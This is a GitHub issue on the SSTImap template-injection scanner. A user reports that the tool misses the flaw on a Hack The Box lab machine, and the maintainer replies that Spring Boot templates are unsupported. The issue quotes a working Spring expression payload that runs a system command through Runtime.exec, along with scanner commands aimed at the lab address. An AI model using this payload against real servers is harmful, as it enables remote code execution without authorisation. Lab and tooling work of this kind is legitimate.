SSTIMap fails to find vulnerabiilty on HTB RedPanda box

vladko312 / SSTImap

Automatic SSTI detection tool with interactive interface

GNU General Public License v3.0

809 stars 95 forks source link

SSTIMap fails to find vulnerabiilty on HTB RedPanda box #34

Open edwardsd97 opened 9 months ago

edwardsd97 commented 9 months ago

https://app.hackthebox.com/machines/481

python sstimap.py -u 'http://10.10.11.170:8080/search?name=test'

This box is vulnerable to Spring Boot e.g. *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}

Also fails in post mode python sstimap.py -m POST -u 'http://10.10.11.170:8080/search?name=test'

vladko312 commented 9 months ago

SSTImap currently does not support Spring Boot templates. I will work on adding them in the future.